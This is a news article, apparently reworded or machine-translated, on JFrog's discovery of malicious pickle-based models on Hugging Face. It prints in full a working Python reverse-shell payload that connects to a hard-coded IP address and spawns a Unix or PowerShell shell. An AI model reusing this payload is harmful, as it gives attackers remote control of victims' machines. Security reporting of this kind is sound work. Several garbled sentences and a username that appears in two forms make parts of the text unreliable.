Hugging Face, AI’s GitHub, hosted code that backdoors user devices.

Getty Images

WhatsApp Group Join Now
Telegram Group Join Now
Instagram Group Join Now

Code uploaded to AI developer platform HuggingFace has secretly installed backdoors and other types of malware on end-user machines, researchers at security firm JFrog said in a report Thursday, suggesting more to come.

In total, JFrog researchers said, they found about 100 submissions that performed stealth and unwanted actions when they were downloaded and loaded onto an end-user device. Most of the flagged machine learning models — not all of which were discovered by Hugging Face — appear to be benign proofs of concept uploaded by researchers or curious users. JFrog researchers said in an email that 10 of them were “truly malicious” in that they took actions that actually compromised users’ security when loaded.

Full control of user devices

One model caused particular concern because it opened a reverse shell that gave a remote device over the Internet complete control over the user’s device. When the JFrog researchers loaded the model into a lab machine, the submission did indeed load a reverse shell but did no further processing.

This, the IP address of the remote device, and the presence of identical shells raised the possibility of connections from other locations that the submission was also the work of the researchers. An exploit that opens up a device to such tampering, however, is a major breach of researcher ethics and shows that, like code submitted to GitHub and other developer platforms, AI sites Available models can pose serious risks if not carefully tested first.

“The model’s payload provides an attacker with a shell on the compromised machine, enabling them to gain complete control over the victim’s machines through what is typically a ‘backdoor,'” wrote David Cohen, senior researcher at JFrog. is called.” “These silent intrusions can potentially provide access to critical internal systems and pave the way for large-scale data breaches or even corporate espionage, exposing not only individual users but potentially the entire world.” Entire organizations could be affected, while victims would be completely unaware of their compromised state.”

A lab machine was set up as a honeypot to observe what happened when the model was loaded.

J. Frog

to enlarge / Secrets and other bait data used by the honeypot to attract the threat actor.

J. Frog

How did Baller 432 do it?

Like the other nine truly malicious models, the one discussed here uses pickle, a format that has long been recognized as inherently dangerous. Pickles are commonly used in Python to convert objects and classes in human-readable code into a byte stream that can be saved to disk or shared over a network. This process, known as serialization, allows hackers to hide malicious code in the stream.

The model that spawned the reverse shell, submitted by a party with the username baller432, Hugging Face uses Pickle’s “__reduce__” method to execute arbitrary code after loading the model file. managed to evade the K malware scanner.

JFrog’s Cohen explained the process in much more technically detailed language:

In loading PyTorch models with transformers, a common procedure involves using the torch.load() function, which deserializes the model from a file. Especially when dealing with PyTorch models trained with Hugging Face’s Transformers library, this method is often used to load the model with its architecture, weights and any associated configurations. Transformers provide a comprehensive framework for natural language processing tasks, facilitating the creation and deployment of sophisticated models. In the context of the repository “baller423/goober2”, it appears that a malicious payload was inserted into the PyTorch model file using the pickle module’s __reduce__ method. This method, as shown in the provided reference, enables attackers to inject arbitrary Python code into the deserialization process, potentially leading to malicious behavior when the model is loaded.

Upon analysis of the PyTorch file using the flicking tool, we successfully extracted the following payload:

RHOST = "210.117.212.93"
RPORT = 4242

from sys import platform

if platform != 'win32':
    import threading
    import socket
    import pty
    import os

    def connect_and_spawn_shell():
        s = socket.socket()
        s.connect((RHOST, RPORT))
        [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
        pty.spawn("/bin/sh")

    threading.Thread(target=connect_and_spawn_shell).start()
else:
    import os
    import socket
    import subprocess
    import threading
    import sys

    def send_to_process(s, p):
        while True:
            p.stdin.write(s.recv(1024).decode())
            p.stdin.flush()

    def receive_from_process(s, p):
        while True:
            s.send(p.stdout.read(1).encode())

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    while True:
        try:
            s.connect((RHOST, RPORT))
            break
        except:
            pass

    p = subprocess.Popen(["powershell.exe"], 
                         stdout=subprocess.PIPE,
                         stderr=subprocess.STDOUT,
                         stdin=subprocess.PIPE,
                         shell=True,
                         text=True)

    threading.Thread(target=send_to_process, args=[s, p], daemon=True).start()
    threading.Thread(target=receive_from_process, args=[s, p], daemon=True).start()
    p.wait()

Hugging Face has since removed the model and others flagged by JFrog.

WhatsApp Group Join Now
Telegram Group Join Now
Instagram Group Join Now

Leave a Comment